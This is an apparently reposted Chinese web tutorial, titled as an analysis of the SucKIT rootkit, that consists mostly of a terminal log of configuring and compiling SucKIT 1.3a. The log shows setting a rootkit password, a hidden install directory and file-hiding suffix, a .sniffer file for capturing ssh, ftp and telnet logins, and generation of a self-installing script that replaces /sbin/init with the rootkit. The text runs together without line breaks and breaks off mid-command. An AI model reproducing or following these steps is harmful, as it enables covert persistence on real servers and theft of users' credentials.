当前位置: 首页 > 图文教程 > 操作系统 > Unix/Linux > suckit后门程序的分析 (二)

Unix/Linux
FreeBSD 数据转移办法
Freebsd 下运行QQ For Linux 的方法
FreeBSD, Debian, CentOS一个网卡绑定多个IP
freebsd下切换到root下 su: Sorry 的解决办法
Freebsd挂载光驱和软驱
FREEBSD下运行调试asterisk
一些 freebsd 的常用命令
笔记本上安装freebsd的小知识
FreeBSD系统下添加中文字体
FreeBSD挂载DOS分区,正确显示中文
FreeBSD挂载DOS分区时显示中文的方法
freebsd7.0安装系统图解(最新版)
服务器的时间同步设置方法
FreeBSD FTP 的架设教程
FreeBSD mpd VPN服务器安装步骤
更新FreeBSD Port Tree的几种方法小结
portupgrade 中文手册(翻译)
freebsd 服务器 ARP绑定脚本
在Ubuntu系统中定制 Compiz Fusion 特效
Ubuntu 7.10 绑定IP及MAC地址

Unix/Linux 中的 suckit后门程序的分析 (二)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-01   浏览: 192 ::
收藏到网摘: n/a


这篇文章为我早期的时候发表的文章,为什么我要写这个呢?因为这个程序写得太精妙了,我不得不佩服他的隐藏性,非常先进。看看我写的就知道他的精妙之处了!
关于这场攻击与反攻击的文章我随后几天撰写。精彩不容错过!:P
[root@Learning sk-1.3a]#makePlease do `make skconfig` in top level directory to generate configuration file.make: *** [include/config.h] Error 1 (告诉我们不要用make,而是用make skconfig)[root@Learning sk-1.3a]#make skconfigrm -f include/config.h sk login instmake[1]: Entering directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o passmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'[===== SucKIT version 1.3a, Jul 26 2004 =====][====== ©oded by sd & devik , 2002 ======]Please enter new rootkit password: (让我们输入密码)Again, just to be sure: (再次输入确认密码)OK, new password set.Home directory [/usr/share/locale/sk/.sk12]: (通过后门进入的缺省目录)Magic file-hiding suffix [sk12]: (sk12后门程序,使用ls –l可以察看到有个.sniffer文件,这个文件是可以窃听到ssh、ftp、telnet等远程登陆的用户名与密码信息,这也正是为何debian服务器接连被黑的事件发生) Configuration saved. (保存配置文件)From now, _only_ this configuration will be used by generatedbinaries till you do skconfig again.To (re)build all of stuff type 'make' (开始执行make命令)[root@Learning sk-1.3a]# makemake[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o loginrm -f sk kernel.omake skmake[2]: Entering directory `/root/backdoor/sk-1.3a/src'make[3]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.cgcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version" >> kernel.sgcc -c kernel.sgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.cmake[3]: Leaving directory `/root/backdoor/sk-1.3a/src'gcc -s -nostdlib *.o -o skmake[2]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2octmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'cp -f src/DownloadFiles\login logincp -f src/DownloadFiles\sk skCreating install scriptecho "#!/bin/bash" > instecho "D=`cat include/config.h | grep HOME | awk {'print '}`" >> instecho "H=`cat include/config.h | grep HIDESTR | awk {'print '}`" >> instecho "mkdir -p $D; cd $D" >> instecho "echo > .sniffer; chmod 0622 .sniffer" >> instecho "echo -n -e `gzip -9 -c sk | src/DownloadFiles\bin2oct` | gzip -d > sk" >> instecho "chmod 0755 sk; if [ ! -f /sbin/init$ ]; " \"then cp -f /sbin/init /sbin/init$; fi;" \"rm -f /sbin/init; cp sk /sbin/init" >> instOkay, file 'inst' is complete, self-installing script. (将inst文件属性为可执行)Just upload it somewhere, execute and you could log in using./DownloadFiles\login binary.Have fun![root@Learning sk-1.3a]#chmod +x inst (将inst文件属性为可执行)[root@Learning sk-1.3a]# ./i